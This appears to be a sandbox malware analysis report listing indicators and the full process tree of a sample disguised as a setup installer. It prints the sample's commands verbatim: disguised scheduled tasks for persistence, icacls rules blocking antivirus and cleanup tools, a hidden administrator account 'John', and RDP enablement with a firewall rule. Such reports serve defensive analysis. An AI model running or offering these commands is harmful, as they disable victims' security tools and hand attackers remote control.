  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | smss.exe
Creates scheduled task(s) [1 TTP, 8 IoCs]
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (8 instances)
  pid | process
  1568 | schtasks.exe
  3140 | schtasks.exe
  3164 | schtasks.exe
  2992 | schtasks.exe
  2928 | schtasks.exe
  1748 | schtasks.exe
  3156 | schtasks.exe
  424 | schtasks.exe
Delays execution with timeout.exe [1 IoC]
Processes: timeout.exe
  pid | process
  2052 | timeout.exe
Modifies registry class [3 IoCs]
Processes: smss.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\MIME\Database | smss.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | smss.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | smss.exe
NTFS ADS [3 IoCs]
Processes: IP.exe, smss.exe
  description | ioc | process
  File opened for modification | C:\ProgramData\Setup\winmgmts:\ | IP.exe
  File opened for modification | C:\ProgramData\Setup\WinMgmts:\ | IP.exe
  File opened for modification | C:\ProgramData\Setup\winmgmts:\ | smss.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses [64 IoCs]
Processes: Setup.exe, update.exe, smss.exe
  pid | process (64 hits in total; repeated identical rows collapsed)
  1804 | Setup.exe (repeated)
  3708 | update.exe (repeated)
  2732 | smss.exe (repeated)
Suspicious behavior: GetForegroundWindowSpam [2 IoCs]
Processes: Setup.exe, unsecapp.exe
  pid | process
  1804 | Setup.exe
  1944 | unsecapp.exe
Suspicious behavior: LoadsDriver [1 IoC]
Processes:
  pid | process
  672 |
Suspicious use of AdjustPrivilegeToken [7 IoCs]
Processes: winserv.exe (3 instances), RDPWinst.exe, svchost.exe
  description | pid | process
  Token: SeDebugPrivilege | 3812 | winserv.exe
  Token: SeDebugPrivilege | 1636 | winserv.exe
  Token: SeTakeOwnershipPrivilege | 2860 | winserv.exe
  Token: SeTcbPrivilege | 2860 | winserv.exe
  Token: SeTcbPrivilege | 2860 | winserv.exe
  Token: SeDebugPrivilege | 1372 | RDPWinst.exe
  Token: SeAuditPrivilege | 3932 | svchost.exe
Suspicious use of SetWindowsHookEx [24 IoCs]
Processes: KMS.exe, update.exe, win.exe, svchost.exe, IP.exe, smss.exe, winserv.exe (4 instances), RDPWinst.exe
  pid | process (repeated identical rows shown with a count)
  1272 | KMS.exe
  3708 | update.exe
  3328 | win.exe
  3912 | svchost.exe
  2304 | IP.exe
  2732 | smss.exe
  3812 | winserv.exe (x5)
  2860 | winserv.exe (x4)
  1636 | winserv.exe (x4)
  1320 | winserv.exe (x4)
  1372 | RDPWinst.exe
Suspicious use of WriteProcessMemory [64 IoCs]
Processes: Setup.exe, install.exe, update.exe, cmd.exe, svchost.exe, smss.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe
  description | pid | process | target process (repeated identical rows shown with a count)
  PID 1804 wrote to memory of 4504 | 1804 | Setup.exe | install.exe (x3)
  PID 4504 wrote to memory of 1272 | 4504 | install.exe | KMS.exe (x2)
  PID 4504 wrote to memory of 3708 | 4504 | install.exe | update.exe (x2)
  PID 3708 wrote to memory of 1568 | 3708 | update.exe | schtasks.exe (x2)
  PID 3708 wrote to memory of 3140 | 3708 | update.exe | schtasks.exe (x2)
  PID 3708 wrote to memory of 3164 | 3708 | update.exe | schtasks.exe (x2)
  PID 3708 wrote to memory of 2992 | 3708 | update.exe | schtasks.exe (x2)
  PID 3708 wrote to memory of 2928 | 3708 | update.exe | schtasks.exe (x2)
  PID 3708 wrote to memory of 3328 | 3708 | update.exe | win.exe (x3)
  PID 3708 wrote to memory of 1748 | 3708 | update.exe | schtasks.exe (x2)
  PID 3708 wrote to memory of 2052 | 3708 | update.exe | cmd.exe (x2)
  PID 3708 wrote to memory of 4080 | 3708 | update.exe | cmd.exe (x2)
  PID 4080 wrote to memory of 2476 | 4080 | cmd.exe | icacls.exe (x2)
  PID 3708 wrote to memory of 3912 | 3708 | update.exe | svchost.exe (x3)
  PID 3912 wrote to memory of 2304 | 3912 | svchost.exe | IP.exe (x2)
  PID 3912 wrote to memory of 2732 | 3912 | svchost.exe | smss.exe (x2)
  PID 2732 wrote to memory of 3156 | 2732 | smss.exe | schtasks.exe (x2)
  PID 2732 wrote to memory of 424 | 2732 | smss.exe | schtasks.exe (x2)
  PID 2732 wrote to memory of 3812 | 2732 | smss.exe | winserv.exe (x3)
  PID 2732 wrote to memory of 4768 | 2732 | smss.exe | cmd.exe (x2)
  PID 4768 wrote to memory of 1508 | 4768 | cmd.exe | net.exe (x2)
  PID 1508 wrote to memory of 1316 | 1508 | net.exe | net1.exe (x2)
  PID 2732 wrote to memory of 1552 | 2732 | smss.exe | cmd.exe (x2)
  PID 1552 wrote to memory of 2436 | 1552 | cmd.exe | net.exe (x2)
  PID 2436 wrote to memory of 560 | 2436 | net.exe | Conhost.exe (x2)
  PID 2732 wrote to memory of 3672 | 2732 | smss.exe | cmd.exe (x2)
  PID 3672 wrote to memory of 1568 | 3672 | cmd.exe | net.exe (x2)
  PID 2732 wrote to memory of 4816 | 2732 | smss.exe | cmd.exe (x2)
  PID 1568 wrote to memory of 4852 | 1568 | net.exe | net1.exe (x2)
  PID 4816 wrote to memory of 4752 | 4816 | cmd.exe | cmd.exe (x2)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\install.exeC:\ProgramData\Setup\install.exe -palexpassword2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\KMS.exe"C:\ProgramData\Setup\KMS.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CleanCash" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OfficeCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CheckGlobal" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Microsoft\win.exeC:\ProgramData\Microsoft\win.exe -ppidar4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\DataBaseA\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\GB2x8f82s0LV6\DataBaseA.bat" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\unsecapp.exeC:\Windows\SysWOW64\unsecapp.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat6⤵
- Drops file in Drivers directory
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST6⤵
- Creates scheduled task(s)
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet user John 12345 /add7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add8⤵
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i6⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow7⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat6⤵
-
C:\Windows\system32\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
